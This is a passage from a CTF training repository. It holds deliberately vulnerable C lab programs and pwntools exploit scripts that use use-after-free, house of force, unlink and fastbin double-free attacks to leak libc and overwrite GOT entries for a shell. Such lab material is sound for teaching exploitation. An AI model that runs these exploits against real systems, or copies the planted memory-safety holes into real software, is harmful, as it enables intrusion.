├── LAB ├── lab1 │ ├── solve │ ├── sysmagic │ └── sysmagic.c ├── lab10 │ ├── Makefile │ ├── hacknote │ ├── hacknote.c │ ├── hacknote.py │ └── solve.py ├── lab11 │ ├── Makefile │ ├── bamboobox │ ├── bamboobox.c │ ├── bamboobox.i64 │ ├── bamboobox1.py │ ├── bamboobox2.py │ ├── hof_func_ptr.py │ ├── hof_got.py │ ├── struct │ └── unlink.py ├── lab12 │ ├── Makefile │ ├── secret.py │ ├── secretgarden │ ├── secretgarden.c │ ├── secretgarden.i64 │ ├── solve.py │ └── struct ├── lab13 │ ├── Makefile │ ├── heapcreator │ ├── heapcreator.c │ ├── heapcreator.py │ ├── libc-2.23.so.i386 │ ├── solve.py │ └── struct ├── lab14 │ ├── Makefile │ ├── magicheap │ ├── magicheap.c │ ├── magicheap.i64 │ ├── magicheap.py │ └── solve.py ├── lab15 │ ├── Makefile │ ├── solve.py │ ├── zoo │ ├── zoo.cpp │ ├── zoo.i64 │ └── zoo.py ├── lab2 │ ├── Makefile │ ├── orw.asm │ ├── orw.bin │ ├── orw.py │ ├── solve.py │ └── testFlag ├── lab3 │ ├── Makefile │ ├── ret2sc │ ├── ret2sc.c │ ├── ret2sc.py │ └── solve.py ├── lab4 │ ├── Makefile │ ├── ret2lib │ ├── ret2lib.c │ ├── ret2lib.py │ └── solve.py ├── lab5 │ ├── makefile │ ├── simplerop │ ├── simplerop.c │ ├── simplerop.py │ ├── solve.py │ └── tmp.py ├── lab6 │ ├── makefile │ ├── migration │ ├── migration.c │ ├── migration.idb │ ├── migration.py │ └── stack-pivot.py ├── lab7 │ ├── Makefile │ ├── crack │ ├── crack.c │ ├── crack.idb │ ├── crack.py │ ├── hijack.py │ ├── leak.py │ └── overwrite.py ├── lab8 │ ├── Makefile │ ├── craxme │ ├── craxme.c │ ├── craxme.idb │ ├── craxme.py │ ├── craxme2.py │ └── solve.py └── lab9 │ ├── Makefile │ ├── libc-2.24.so │ ├── playfmt │ ├── playfmt.c │ ├── playfmt.idb │ └── solve.py ├── LICENSE ├── Pic ├── 深度截图_选择区域_20180314213356.png ├── 深度截图_选择区域_20180314213554.png ├── 深度截图_选择区域_20180314213803.png ├── 深度截图_选择区域_20180314214002.png └── 深度截图_选择区域_20180314222026.png ├── README.md ├── env_setup.sh └── writeup.md /LAB/lab1/solve: -------------------------------------------------------------------------------- 1 | b *get_flag+389 2 | r 3 | #your input 4 | set $eax=$edx 5 | c 6 | -------------------------------------------------------------------------------- /LAB/lab1/sysmagic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab1/sysmagic -------------------------------------------------------------------------------- /LAB/lab1/sysmagic.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | void get_flag(){ 7 | int fd ; 8 | int password; 9 | int magic ; 10 | char key[] = "Do_you_know_why_my_teammate_Orange_is_so_angry???"; 11 | char cipher[] = {7, 59, 25, 2, 11, 16, 61, 30, 9, 8, 18, 45, 40, 89, 10, 0, 30, 22, 0, 4, 85, 22, 8, 31, 7, 1, 9, 0, 126, 28, 62, 10, 30, 11, 107, 4, 66, 60, 44, 91, 49, 85, 2, 30, 33, 16, 76, 30, 66}; 12 | fd = open("/dev/urandom",0); 13 | read(fd,&password,4); 14 | printf("Give me maigc :"); 15 | scanf("%d",&magic); 16 | if(password == magic){ 17 | for(int i = 0 ; i < sizeof(cipher) ; i++){ 18 | printf("%c",cipher[i]^key[i]); 19 | } 20 | } 21 | } 22 | 23 | 24 | int main(){ 25 | setvbuf(stdout,0,2,0); 26 | get_flag(); 27 | return 0 ; 28 | } 29 | -------------------------------------------------------------------------------- /LAB/lab10/Makefile: -------------------------------------------------------------------------------- 1 | hacknote:hacknote.c 2 | gcc -m32 hacknote.c -o hacknote 3 | -------------------------------------------------------------------------------- /LAB/lab10/hacknote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab10/hacknote -------------------------------------------------------------------------------- /LAB/lab10/hacknote.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | struct note { 6 | void (*printnote)(); 7 | char *content ; 8 | }; 9 | 10 | struct note *notelist[5]; 11 | int count = 0; 12 | 13 | void print_note_content(struct note *this){ 14 | puts(this->content); 15 | } 16 | void add_note(){ 17 | int i ; 18 | char buf[8]; 19 | int size ; 20 | if(count > 5){ 21 | puts("Full"); 22 | return ; 23 | } 24 | for(i = 0 ; i < 5 ; i ++){ 25 | if(!notelist[i]){ 26 | notelist[i] = (struct note*)malloc(sizeof(struct note)); 27 | if(!notelist[i]){ 28 | puts("Alloca Error"); 29 | exit(-1); 30 | } 31 | notelist[i]->printnote = print_note_content; 32 | printf("Note size :"); 33 | read(0,buf,8); 34 | size = atoi(buf); 35 | notelist[i]->content = (char *)malloc(size); 36 | if(!notelist[i]->content){ 37 | puts("Alloca Error"); 38 | exit(-1); 39 | } 40 | printf("Content :"); 41 | read(0,notelist[i]->content,size); 42 | puts("Success !"); 43 | count++; 44 | break; 45 | } 46 | } 47 | } 48 | 49 | void del_note(){ 50 | char buf[4]; 51 | int idx ; 52 | printf("Index :"); 53 | read(0,buf,4); 54 | idx = atoi(buf); 55 | if(idx < 0 || idx >= count){ 56 | puts("Out of bound!"); 57 | _exit(0); 58 | } 59 | if(notelist[idx]){ 60 | free(notelist[idx]->content); 61 | free(notelist[idx]); 62 | puts("Success"); 63 | } 64 | } 65 | 66 | void print_note(){ 67 | char buf[4]; 68 | int idx ; 69 | printf("Index :"); 70 | read(0,buf,4); 71 | idx = atoi(buf); 72 | if(idx < 0 || idx >= count){ 73 | puts("Out of bound!"); 74 | _exit(0); 75 | } 76 | if(notelist[idx]){ 77 | notelist[idx]->printnote(notelist[idx]); 78 | } 79 | } 80 | 81 | void magic(){ 82 | system("cat /home/hacknote/flag"); 83 | } 84 | 85 | 86 | void menu(){ 87 | puts("----------------------"); 88 | puts(" HackNote "); 89 | puts("----------------------"); 90 | puts(" 1. Add note "); 91 | puts(" 2. Delete note "); 92 | puts(" 3. Print note "); 93 | puts(" 4. Exit "); 94 | puts("----------------------"); 95 | printf("Your choice :"); 96 | }; 97 | 98 | int main(){ 99 | setvbuf(stdout,0,2,0); 100 | setvbuf(stdin,0,2,0); 101 | char buf[4]; 102 | while(1){ 103 | menu(); 104 | read(0,buf,4); 105 | switch(atoi(buf)){ 106 | case 1 : 107 | add_note(); 108 | break ; 109 | case 2 : 110 | del_note(); 111 | break ; 112 | case 3 : 113 | print_note(); 114 | break ; 115 | case 4 : 116 | exit(0); 117 | break ; 118 | default : 119 | puts("Invalid choice"); 120 | break ; 121 | 122 | } 123 | } 124 | return 0; 125 | } 126 | -------------------------------------------------------------------------------- /LAB/lab10/hacknote.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwnpwnpwn import * 4 | from pwn import * 5 | 6 | host = "training.pwnable.tw" 7 | port = 11010 8 | 9 | r = remote(host,port) 10 | 11 | def addnote(size,content): 12 | r.recvuntil(":") 13 | r.sendline("1") 14 | r.recvuntil(":") 15 | r.sendline(str(size)) 16 | r.recvuntil(":") 17 | r.sendline(content) 18 | 19 | def delnote(idx): 20 | r.recvuntil(":") 21 | r.sendline("2") 22 | r.recvuntil(":") 23 | r.sendline(str(idx)) 24 | 25 | def printnote(idx): 26 | r.recvuntil(":") 27 | r.sendline("3") 28 | r.recvuntil(":") 29 | r.sendline(str(idx)) 30 | 31 | magic = 0x08048986 32 | system = 0x8048506 33 | addnote(32,"ddaa") 34 | addnote(32,"ddaa") 35 | addnote(32,"ddaa") 36 | delnote(0) 37 | delnote(1) 38 | addnote(8,p32(magic)) 39 | printnote(0) 40 | r.interactive() 41 | -------------------------------------------------------------------------------- /LAB/lab10/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | context.log_level = "debug" 7 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 8 | 9 | def debug(): 10 | raw_input("DEBUG: ") 11 | gdb.attach(io) 12 | 13 | io = process("./hacknote") 14 | elf = ELF("./hacknote") 15 | magic_elf = elf.symbols["magic"] 16 | 17 | 18 | def addNote(size, content): 19 | io.sendafter("choice :", "1") 20 | io.sendafter("size ", str(size)) 21 | io.sendafter("Content :", content) 22 | 23 | def delNote(idx): 24 | # debug() 25 | io.sendafter("choice :", "2") 26 | io.sendafter("Index :", str(idx)) 27 | 28 | def printNote(idx): 29 | # debug() 30 | io.sendafter("choice :", "3") 31 | io.sendafter("Index :", str(idx)) 32 | 33 | def uaf(): 34 | addNote(24, "a" * 24) 35 | addNote(24, "b" * 24) 36 | 37 | delNote(0) 38 | delNote(1) 39 | # debug() 40 | addNote(8,p32(magic_elf)) 41 | 42 | printNote(0) 43 | 44 | if __name__ == "__main__": 45 | uaf() 46 | io.interactive() 47 | io.close() 48 | -------------------------------------------------------------------------------- /LAB/lab11/Makefile: -------------------------------------------------------------------------------- 1 | bamboobox:bamboobox.c 2 | gcc bamboobox.c -o bamboobox 3 | -------------------------------------------------------------------------------- /LAB/lab11/bamboobox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab11/bamboobox -------------------------------------------------------------------------------- /LAB/lab11/bamboobox.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | struct item{ 8 | int size ; 9 | char *name ; 10 | }; 11 | 12 | struct item itemlist[100] = {0}; 13 | 14 | int num ; 15 | 16 | void hello_message(){ 17 | puts("There is a box with magic"); 18 | puts("what do you want to do in the box"); 19 | } 20 | 21 | void goodbye_message(){ 22 | puts("See you next time"); 23 | puts("Thanks you"); 24 | } 25 | 26 | struct box{ 27 | void (*hello_message)(); 28 | void (*goodbye_message)(); 29 | }; 30 | 31 | void menu(){ 32 | puts("----------------------------"); 33 | puts("Bamboobox Menu"); 34 | puts("----------------------------"); 35 | puts("1.show the items in the box"); 36 | puts("2.add a new item"); 37 | puts("3.change the item in the box"); 38 | puts("4.remove the item in the box"); 39 | puts("5.exit"); 40 | puts("----------------------------"); 41 | printf("Your choice:"); 42 | } 43 | 44 | 45 | void show_item(){ 46 | int i ; 47 | if(!num){ 48 | puts("No item in the box"); 49 | }else{ 50 | for(i = 0 ; i < 100; i++){ 51 | if(itemlist[i].name){ 52 | printf("%d : %s",i,itemlist[i].name); 53 | } 54 | } 55 | puts(""); 56 | } 57 | } 58 | 59 | int add_item(){ 60 | 61 | char sizebuf[8] ; 62 | int length ; 63 | int i ; 64 | int size ; 65 | if(num < 100){ 66 | printf("Please enter the length of item name:"); 67 | read(0,sizebuf,8); 68 | length = atoi(sizebuf); 69 | if(length == 0){ 70 | puts("invaild length"); 71 | return 0; 72 | } 73 | for(i = 0 ; i < 100 ; i++){ 74 | if(!itemlist[i].name){ 75 | itemlist[i].size = length ; 76 | itemlist[i].name = (char*)malloc(length); 77 | printf("Please enter the name of item:"); 78 | size = read(0,itemlist[i].name,length); 79 | itemlist[i].name[size] = '\x00'; 80 | num++; 81 | break; 82 | } 83 | } 84 | 85 | }else{ 86 | puts("the box is full"); 87 | } 88 | return 0; 89 | } 90 | 91 | 92 | 93 | void change_item(){ 94 | 95 | char indexbuf[8] ; 96 | char lengthbuf[8]; 97 | int length ; 98 | int index ; 99 | int readsize ; 100 | 101 | if(!num){ 102 | puts("No item in the box"); 103 | }else{ 104 | printf("Please enter the index of item:"); 105 | read(0,indexbuf,8); 106 | index = atoi(indexbuf); 107 | if(itemlist[index].name){ 108 | printf("Please enter the length of item name:"); 109 | read(0,lengthbuf,8); 110 | length = atoi(lengthbuf); 111 | printf("Please enter the new name of the item:"); 112 | readsize = read(0,itemlist[index].name,length); 113 | *(itemlist[index].name + readsize) = '\x00'; 114 | }else{ 115 | puts("invaild index"); 116 | } 117 | 118 | } 119 | 120 | } 121 | 122 | void remove_item(){ 123 | char indexbuf[8] ; 124 | int index ; 125 | 126 | if(!num){ 127 | puts("No item in the box"); 128 | }else{ 129 | printf("Please enter the index of item:"); 130 | read(0,indexbuf,8); 131 | index = atoi(indexbuf); 132 | if(itemlist[index].name){ 133 | free(itemlist[index].name); 134 | itemlist[index].name = 0 ; 135 | itemlist[index].size = 0 ; 136 | puts("remove successful!!"); 137 | num-- ; 138 | }else{ 139 | puts("invaild index"); 140 | } 141 | } 142 | } 143 | 144 | void magic(){ 145 | int fd ; 146 | char buffer[100]; 147 | fd = open("/home/bamboobox/flag",O_RDONLY); 148 | read(fd,buffer,sizeof(buffer)); 149 | close(fd); 150 | printf("%s",buffer); 151 | exit(0); 152 | } 153 | 154 | int main(){ 155 | 156 | char choicebuf[8]; 157 | int choice; 158 | struct box *bamboo ; 159 | setvbuf(stdout,0,2,0); 160 | setvbuf(stdin,0,2,0); 161 | bamboo = malloc(sizeof(struct box)); 162 | bamboo->hello_message = hello_message; 163 | bamboo->goodbye_message = goodbye_message ; 164 | bamboo->hello_message(); 165 | 166 | while(1){ 167 | menu(); 168 | read(0,choicebuf,8); 169 | choice = atoi(choicebuf); 170 | switch(choice){ 171 | case 1: 172 | show_item(); 173 | break; 174 | case 2: 175 | add_item(); 176 | break; 177 | case 3: 178 | change_item(); 179 | break; 180 | case 4: 181 | remove_item(); 182 | break; 183 | case 5: 184 | bamboo->goodbye_message(); 185 | exit(0); 186 | break; 187 | default: 188 | puts("invaild choice!!!"); 189 | break; 190 | 191 | } 192 | } 193 | 194 | return 0 ; 195 | } 196 | -------------------------------------------------------------------------------- /LAB/lab11/bamboobox.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab11/bamboobox.i64 -------------------------------------------------------------------------------- /LAB/lab11/bamboobox1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwnpwnpwn import * 4 | from pwn import * 5 | 6 | host = "training.pwnable.tw" 7 | port = 11011 8 | 9 | r = remote(host,port) 10 | 11 | def additem(length,name): 12 | r.recvuntil(":") 13 | r.sendline("2") 14 | r.recvuntil(":") 15 | r.sendline(str(length)) 16 | r.recvuntil(":") 17 | r.sendline(name) 18 | 19 | def modify(idx,length,name): 20 | r.recvuntil(":") 21 | r.sendline("3") 22 | r.recvuntil(":") 23 | r.sendline(str(idx)) 24 | r.recvuntil(":") 25 | r.sendline(str(length)) 26 | r.recvuntil(":") 27 | r.sendline(name) 28 | 29 | def remove(idx): 30 | r.recvuntil(":") 31 | r.sendline("4") 32 | r.recvuntil(":") 33 | r.sendline(str(idx)) 34 | 35 | def show(): 36 | r.recvuntil(":") 37 | r.sendline("1") 38 | 39 | magic = 0x400d49 40 | additem(0x60,"ddaa") 41 | modify(0,0x70,"a"*0x60 + p64(0) + p64(0xffffffffffffffff)) 42 | additem(-160,"dada") 43 | additem(0x20,p64(magic)*2) 44 | r.interactive() 45 | -------------------------------------------------------------------------------- /LAB/lab11/bamboobox2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | host = "training.pwnable.tw" 6 | port = 11011 7 | 8 | 9 | # r = remote(host,port) 10 | r = process("./bamboobox") 11 | 12 | def additem(length,name): 13 | r.recvuntil(":") 14 | r.sendline("2") 15 | r.recvuntil(":") 16 | r.sendline(str(length)) 17 | r.recvuntil(":") 18 | r.sendline(name) 19 | 20 | def modify(idx,length,name): 21 | r.recvuntil(":") 22 | r.sendline("3") 23 | r.recvuntil(":") 24 | r.sendline(str(idx)) 25 | r.recvuntil(":") 26 | r.sendline(str(length)) 27 | r.recvuntil(":") 28 | r.sendline(name) 29 | 30 | def remove(idx): 31 | r.recvuntil(":") 32 | r.sendline("4") 33 | r.recvuntil(":") 34 | r.sendline(str(idx)) 35 | 36 | def show(): 37 | r.recvuntil(":") 38 | r.sendline("1") 39 | 40 | additem(0x40,"a"*8) 41 | additem(0x80,"b"*8) 42 | additem(0x40,"c"*8) 43 | ptr = 0x6020c8 44 | fake_chunk = p64(0) #prev_size 45 | fake_chunk += p64(0x41) #size 46 | fake_chunk += p64(ptr-0x18) #fd 47 | fake_chunk += p64(ptr-0x10) #bk 48 | fake_chunk += "c"*0x20 49 | fake_chunk += p64(0x40) 50 | fake_chunk += p64(0x90) 51 | modify(0,0x80,fake_chunk) 52 | remove(1) 53 | payload = p64(0)*2 54 | payload += p64(0x40) + p64(0x602068) 55 | modify(0,0x80,payload) 56 | show() 57 | r.recvuntil("0 : ") 58 | atoi = u64(r.recvuntil(":")[:6].ljust(8,"\x00")) 59 | libc = atoi - 0x36e80 60 | print "libc:",hex(libc) 61 | system = libc + 0x45390 62 | modify(0,0x8,p64(system)) 63 | r.recvuntil(":") 64 | r.sendline("sh") 65 | r.interactive() 66 | -------------------------------------------------------------------------------- /LAB/lab11/hof_func_ptr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from zio import l64 7 | from time import sleep 8 | import sys 9 | context.log_level = "debug" 10 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 11 | 12 | io = process("./bamboobox") 13 | 14 | def DEBUG(): 15 | raw_input("DEBUG: ") 16 | gdb.attach(io) 17 | 18 | 19 | def add(length, name): 20 | io.sendlineafter(":", "2") 21 | io.sendlineafter(":", str(length)) 22 | io.sendafter(":", name) 23 | 24 | def change(idx, length, name): 25 | io.sendlineafter(":", "3") 26 | io.sendlineafter(":", str(idx)) 27 | io.sendlineafter(":", str(length)) 28 | io.sendafter(":", name) 29 | 30 | def exit(): 31 | io.sendlineafter(":", "5") 32 | 33 | if __name__ == "__main__": 34 | add(0x60, cyclic(0x60)) 35 | change(0, 0x60 + 0x10, cyclic(0x60) + p64(0) + l64(-1)) 36 | # DEBUG() 37 | add(-(0x60 + 0x10) - (0x10 + 0x10) - 0x10, 'aaaa') 38 | add(0x10, p64(ELF("./bamboobox").sym['magic']) * 2) 39 | exit() 40 | 41 | io.interactive() 42 | io.close() 43 | -------------------------------------------------------------------------------- /LAB/lab11/hof_got.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from zio import l64 7 | from time import sleep 8 | import sys 9 | context.log_level = "debug" 10 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 11 | 12 | io = process("./bamboobox") 13 | 14 | def DEBUG(): 15 | raw_input("DEBUG: ") 16 | gdb.attach(io) 17 | 18 | 19 | def add(length, name): 20 | io.sendlineafter(":", "2") 21 | io.sendlineafter(":", str(length)) 22 | io.sendafter(":", name) 23 | 24 | def change(idx, length, name): 25 | io.sendlineafter(":", "3") 26 | io.sendlineafter(":", str(idx)) 27 | io.sendlineafter(":", str(length)) 28 | io.sendafter(":", name) 29 | 30 | def remove(idx): 31 | io.sendlineafter(":", "4") 32 | io.sendlineafter(":", str(idx)) 33 | 34 | def exit(): 35 | io.sendlineafter(":", "5") 36 | 37 | if __name__ == "__main__": 38 | add(0x60, cyclic(0x60)) 39 | DEBUG() 40 | change(0, 0x60 + 0x10, cyclic(0x60) + p64(0) + l64(-1)) 41 | # payload = 42 | 43 | 44 | io.interactive() 45 | io.close() 46 | -------------------------------------------------------------------------------- /LAB/lab11/struct: -------------------------------------------------------------------------------- 1 | struct ITEM 2 | { 3 | int len; 4 | char *name; 5 | } 6 | -------------------------------------------------------------------------------- /LAB/lab11/unlink.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from time import sleep 7 | import sys 8 | context.arch = 'amd64' 9 | context.log_level = "debug" 10 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 11 | 12 | io = process("./bamboobox") 13 | # process("./bamboobox").libc will assign libc.address but ELF("./bamboobox") won't 14 | # libc = io.libc 15 | elf = ELF("./bamboobox") 16 | libc = elf.libc 17 | 18 | def DEBUG(cmd = ""): 19 | raw_input("DEBUG: ") 20 | gdb.attach(io, cmd) 21 | 22 | def show(): 23 | io.sendlineafter(":", "1") 24 | 25 | def add(length, name): 26 | io.sendlineafter(":", "2") 27 | io.sendlineafter(":", str(length)) 28 | io.sendafter(":", name) 29 | 30 | def change(idx, length, name): 31 | io.sendlineafter(":", "3") 32 | io.sendlineafter(":", str(idx)) 33 | io.sendlineafter(":", str(length)) 34 | io.sendafter(":", name) 35 | 36 | def remove(idx): 37 | io.sendlineafter(":", "4") 38 | io.sendlineafter(":", str(idx)) 39 | 40 | def exit(): 41 | io.sendlineafter(":", "5") 42 | 43 | if __name__ == "__main__": 44 | # DEBUG() 45 | add(0x40, '0' * 8) 46 | add(0x80, '1' * 8) 47 | add(0x40, '2' * 8) 48 | ptr = 0x6020c8 49 | 50 | fakeChunk = flat([0, 0x41, ptr - 0x18, ptr - 0x10, cyclic(0x20), 0x40, 0x90]) 51 | change(0, 0x80, fakeChunk) 52 | remove(1) 53 | payload = flat([0, 0, 0x40, elf.got['atoi']]) 54 | # DEBUG("b *change_item\nc") 55 | change(0, 0x80, payload) 56 | show() 57 | libc.address = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\x00')) - libc.sym['atoi'] 58 | success("libc.address -> {:#x}".format(libc.address)) 59 | # libcBase = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\x00')) - libc.sym['atoi'] 60 | # success("libcBase -> {:#x}".format(libcBase)) 61 | pause() 62 | 63 | change(0, 0x8, p64(libc.sym['system'])) 64 | # change(0, 0x8, p64(libcBase + libc.sym['system'])) 65 | io.sendline('$0') 66 | 67 | io.interactive() 68 | io.close() 69 | -------------------------------------------------------------------------------- /LAB/lab12/Makefile: -------------------------------------------------------------------------------- 1 | secretgarden:secretgarden.c 2 | gcc secretgarden.c -no-pie -fstack-protector -o secretgarden 3 | -------------------------------------------------------------------------------- /LAB/lab12/secret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | host = "training.pwnable.tw" 6 | port = 11012 7 | 8 | # r = remote(host,port) 9 | r = process("./secretgarden") 10 | 11 | def raiseflower(length,name,color): 12 | r.recvuntil(":") 13 | r.sendline("1") 14 | r.recvuntil(":") 15 | r.sendline(str(length)) 16 | r.recvuntil(":") 17 | r.sendline(name) 18 | r.recvuntil(":") 19 | r.sendline(color) 20 | 21 | def visit(): 22 | r.recvuntil(":") 23 | r.sendline("2") 24 | 25 | def remove(idx): 26 | r.recvuntil(":") 27 | r.sendline("3") 28 | r.recvuntil(":") 29 | r.sendline(str(idx)) 30 | 31 | def clean(): 32 | r.recvuntil(":") 33 | r.sendline("4") 34 | 35 | magic = 0x400c7b 36 | fake_chunk = 0x601ffa 37 | raiseflower(0x50,"da","red") 38 | raiseflower(0x50,"da","red") 39 | remove(0) 40 | remove(1) 41 | remove(0) 42 | raiseflower(0x50,p64(fake_chunk),"blue") 43 | raiseflower(0x50,"da","red") 44 | raiseflower(0x50,"da","red") 45 | raiseflower(0x50,"a"*6 + p64(0) + p64(magic)*2 ,"red") 46 | 47 | r.interactive() 48 | -------------------------------------------------------------------------------- /LAB/lab12/secretgarden: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab12/secretgarden -------------------------------------------------------------------------------- /LAB/lab12/secretgarden.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #define TIMEOUT 60 10 | 11 | 12 | struct flower{ 13 | int vaild ; 14 | char *name ; 15 | char color[24] ; 16 | }; 17 | 18 | 19 | struct flower* flowerlist[100] ; 20 | unsigned int flowercount = 0 ; 21 | 22 | 23 | 24 | void menu(){ 25 | puts(""); 26 | puts("☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ "); 27 | puts("☆ Baby Secret Garden ☆ "); 28 | puts("☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ "); 29 | puts(""); 30 | puts(" 1 . Raise a flower " ); 31 | puts(" 2 . Visit the garden "); 32 | puts(" 3 . Remove a flower from the garden"); 33 | puts(" 4 . Clean the garden"); 34 | puts(" 5 . Leave the garden"); 35 | puts(""); 36 | printf("Your choice : "); 37 | } 38 | 39 | int add(){ 40 | struct flower *newflower = NULL ; 41 | char *buf = NULL ; 42 | unsigned size =0; 43 | unsigned index ; 44 | if(flowercount < 100){ 45 | newflower = malloc(sizeof(struct flower)); 46 | memset(newflower,0,sizeof(struct flower)); 47 | printf("Length of the name :"); 48 | if(scanf("%u",&size)== EOF) exit(-1); 49 | buf = (char*)malloc(size); 50 | if(!buf){ 51 | puts("Alloca error !!"); 52 | exit(-1); 53 | } 54 | printf("The name of flower :"); 55 | read(0,buf,size); 56 | newflower->name = buf ; 57 | printf("The color of the flower :"); 58 | scanf("%23s",newflower->color); 59 | newflower->vaild = 1 ; 60 | for(index = 0 ; index < 100 ; index++ ){ 61 | if(!flowerlist[index]){ 62 | flowerlist[index] = newflower ; 63 | break ; 64 | } 65 | } 66 | flowercount++ ; 67 | puts("Successful !"); 68 | }else{ 69 | puts("The garden is overflow"); 70 | } 71 | } 72 | 73 | int del(){ 74 | unsigned int index ; 75 | if(!flowercount){ 76 | puts("No flower in the garden"); 77 | }else{ 78 | printf("Which flower do you want to remove from the garden:"); 79 | scanf("%d",&index); 80 | if(index < 0 ||index >= 100 || !flowerlist[index]){ 81 | puts("Invalid choice"); 82 | return 0 ; 83 | } 84 | (flowerlist[index])->vaild = 0 ; 85 | free((flowerlist[index])->name); 86 | puts("Successful"); 87 | } 88 | } 89 | 90 | void magic(){ 91 | int fd ; 92 | char buffer[100]; 93 | fd = open("/home/babysecretgarden/flag",O_RDONLY); 94 | read(fd,buffer,sizeof(buffer)); 95 | close(fd); 96 | printf("%s",buffer); 97 | exit(0); 98 | } 99 | 100 | void clean(){ 101 | unsigned index ; 102 | for(index = 0 ; index < 100 ; index++){ 103 | if(flowerlist[index] && (flowerlist[index])->vaild == 0){ 104 | free(flowerlist[index]); 105 | flowerlist[index] = NULL; 106 | flowercount--; 107 | } 108 | } 109 | puts("Done!"); 110 | } 111 | 112 | int visit(){ 113 | unsigned index ; 114 | if(!flowercount){ 115 | puts("No flower in the garden !"); 116 | }else{ 117 | for(index = 0 ; index < 100 ; index++){ 118 | if(flowerlist[index] && (flowerlist[index])->vaild){ 119 | printf("Name of the flower[%u] :%s\n",index,(flowerlist[index])->name); 120 | printf("Color of the flower[%u] :%s\n",index,(flowerlist[index])->color); 121 | } 122 | } 123 | } 124 | } 125 | 126 | void handler(int signum){ 127 | puts("timeout"); 128 | exit(1); 129 | } 130 | void init(){ 131 | int fd; 132 | fd = open("/dev/urandom",0); 133 | close(fd); 134 | setvbuf(stdout,0,2,0); 135 | signal(SIGALRM,handler); 136 | alarm(TIMEOUT); 137 | } 138 | 139 | 140 | int main(){ 141 | init(); 142 | int choice ; 143 | char buf[10]; 144 | while(1){ 145 | menu(); 146 | read(0,buf,8); 147 | choice = atoi(buf); 148 | switch(choice){ 149 | case 1: 150 | add(); 151 | break ; 152 | case 2: 153 | visit(); 154 | break ; 155 | case 3: 156 | del(); 157 | break ; 158 | case 4: 159 | clean(); 160 | break ; 161 | case 5: 162 | puts("See you next time."); 163 | exit(0); 164 | default : 165 | puts("Invalid choice"); 166 | break ; 167 | } 168 | 169 | } 170 | 171 | } 172 | -------------------------------------------------------------------------------- /LAB/lab12/secretgarden.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab12/secretgarden.i64 -------------------------------------------------------------------------------- /LAB/lab12/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | context.log_level = "debug" 7 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 8 | 9 | def DEBUG(): 10 | raw_input("DEBUG: ") 11 | gdb.attach(io, "b *0x4009F2") 12 | 13 | def Raise(length, name): 14 | io.sendlineafter(" : ", "1") 15 | io.sendlineafter(" :", str(length)) 16 | io.sendafter(" :", name) 17 | io.sendlineafter(" :", "nb") 18 | 19 | def remove(idx): 20 | io.sendlineafter(" : ", "3") 21 | io.sendlineafter(":", str(idx)) 22 | 23 | if __name__ == "__main__": 24 | # io = process("./secretgarden", {"LD_PRELOAD": "./libc-2.23.so"}) 25 | io = process("./secretgarden") 26 | 27 | Raise(0x50, "000") # 0 28 | Raise(0x50, "111") # 1 29 | 30 | remove(0) # 0 31 | # pause() 32 | remove(1) # 1 -> 0 33 | remove(0) # 0 -> 1 -> 0 34 | 35 | magic = ELF("./secretgarden").sym["magic"] 36 | # fakeChunk = 0x602028 + 2 - 8 37 | fakeChunk = 0x602000+2-8 38 | 39 | Raise(0x50, 